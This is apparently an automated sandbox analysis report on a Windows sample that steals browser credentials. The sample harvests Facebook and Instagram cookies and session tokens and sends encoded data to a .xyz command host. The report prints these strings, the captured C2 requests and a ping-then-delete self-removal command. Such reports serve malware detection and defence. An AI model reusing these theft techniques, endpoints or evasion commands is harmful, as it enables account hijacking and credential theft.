Play interactive tour

Edit tour

Analysis Report aOn5CfTiwS

Overview

General Information

Sample Name:	aOn5CfTiwS (renamed file extension from none to exe)
Analysis ID:	346349
MD5:	013eba0050ebe18e39978e89a56c0fab
SHA1:	85ef7c03d70e2cc7095550ce15f140e78d05f3ad
SHA256:	5fa60303a0c4fd13ecd69e7c1a17788b72605473c2fb3f93eb758010326c76e5
Most interesting Screenshot:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Multi AV Scanner detection for submitted file

Installs new ROOT certificates

Machine Learning detection for sample

PE file has a writeable .text section

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

PE file contains an invalid checksum

PE file contains strange resources

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

aOn5CfTiwS.exe (PID: 4088 cmdline: 'C:\Users\user\Desktop\aOn5CfTiwS.exe' MD5: 013EBA0050EBE18E39978E89A56C0FAB)

1612058829275.exe (PID: 5644 cmdline: 'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)

ThunderFW.exe (PID: 5436 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)

cmd.exe (PID: 460 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5352 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.265213011.0000000010249000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x16643e:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E
00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x22efa0:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.aOn5CfTiwS.exe.2880000.2.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x22efa0:$x1: cmd /c ping 127.0.0.1 -n
0.2.aOn5CfTiwS.exe.2880000.2.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x22efa0:$x1: cmd /c ping 127.0.0.1 -n
0.2.aOn5CfTiwS.exe.10000000.3.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x22efa0:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: aOn5CfTiwS.exe	Virustotal: Detection: 43%	Perma Link
Source: aOn5CfTiwS.exe	Metadefender: Detection: 24%	Perma Link
Source: aOn5CfTiwS.exe	ReversingLabs: Detection: 47%

Machine Learning detection for sample

Show sources

Source: aOn5CfTiwS.exe

Joe Sandbox ML: detected

Cryptography:

Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Unpacked PE file: 0.2.aOn5CfTiwS.exe.2880000.2.unpack

Uses 32bit PE files

Show sources

Source: aOn5CfTiwS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Uses new MSVCR Dlls

Show sources

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.0.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp, 1612058829275.exe.0.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.0.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.0.dr
Source:	Binary string: atl71.pdb source: atl71.dll.0.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.0.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.0.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.0.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.0.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.0.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.0.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000002.00000000.231496774.000000000095C000.00000002.00020000.sdmp, ThunderFW.exe.0.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.0.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.0.dr

Networking:

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: Joe Sandbox View

IP Address: 198.54.117.244 198.54.117.244

Source: global traffic

HTTP traffic detected: GET /info/dd HTTP/1.1Host: 1a469593c1fe15dc.xyzaccept: */*User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: 9https://www.facebook.com/chat/video/videocalldownload.php+ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: bad allocation"encrypted":"name="fb_dtsg" value="accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://m.facebook.com/?_rdr""logout.phpaccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=\"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://m.facebook.com/logout.phpc_user=deletedbad allocationhttps://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesaccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1ocation: equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/accountquality/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: ocation: accept: /origin: https://www.instagram.comreferer: https://www.instagram.com/sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: cross-siteaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri="access_token":"""access_token":"sessionid="";sessionid=https://www.instagram.com/accounts/login/ajax/facebook/accept: /origin: https://www.instagram.comreferer: https://www.instagram.com/sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: same-originaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1x-csrftoken: xaccessToken=&fbUserId=;sessionid="username":"https://www.instagram.com/accept: /sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: same-originaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1"accept: /sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: same-originaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://www.instagram.com//?__a=1{}graphqluseredge_followed_bycountgraphqluseredge_followed_bycountbad allocationMZ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: origin: https://www.facebook.com equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: seller=^Aguid=^Astatus=^Ainfo/stepbad allocation\Microsoft\Windows\Cookies\Low\..txt\rbc_userxsrb=; c_user=xs=wininet.dllInternetGetCookieEx2InternetFreeCookies=; c_user=xs=https://www.facebook.com/facebook.comc_user=xs=c_user=xs=bad allocationfacebook.com\.txt.exe"%s" /sjson "%s"rbHost NameValueHost NameName=Value; c_user=xs=bad allocation\.\\\Google\Chrome\User Data\Chromium\User DataCookiesSystem ProfileCHROMECHROMIUM\Cookies\Login Data\Local StateChromeUserPath.\fb_cookie.cpp[HIJACK][%s][%s][%d]: [INFO] strCookies = %s strBrowser = %s equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: 1a469593c1fe15dc.xyz

Source: unknown

HTTP traffic detected: POST /info/step HTTP/1.1Host: 1a469593c1fe15dc.xyzaccept: */*Content-Type:application/x-www-form-urlencodedUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Length: 93Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 5a 64 4d 30 58 42 72 45 4c 4b 67 75 74 77 72 64 4a 74 62 31 69 71 5a 6e 39 6a 6a 58 68 58 56 55 41 7e 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFZdM0XBrELKgutwrdJtb1iqZn9jjXhXVUA~~

Source: aOn5CfTiwS.exe	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/dd
Source: aOn5CfTiwS.exe, 00000000.00000003.245417883.00000000022AD000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/ddpbidden
Source: aOn5CfTiwS.exe, 00000000.00000003.245417883.00000000022AD000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/ddpxztN8b6xDUh
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/fb
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/fb1.6
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/fbX
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.211964595.0000000002DF6000.00000004.00000040.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/step
Source: aOn5CfTiwS.exe, 00000000.00000003.230318427.00000000022AE000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepbidden
Source: aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepmsn.com%2FB
Source: aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepstatus=0&L
Source: aOn5CfTiwS.exe, 00000000.00000003.230318427.00000000022AE000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepxztN8b6xDUh
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 6C0CE2DD0584C47CAC18839F14055F19FA270CDD.0.dr	String found in binary or memory: http://charlesproxy.com/ssl
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: xldl.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://exchangework%04d%02d%02d.xyz/accept:
Source: aOn5CfTiwS.exe, 00000000.00000003.216601589.00000000022A8000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
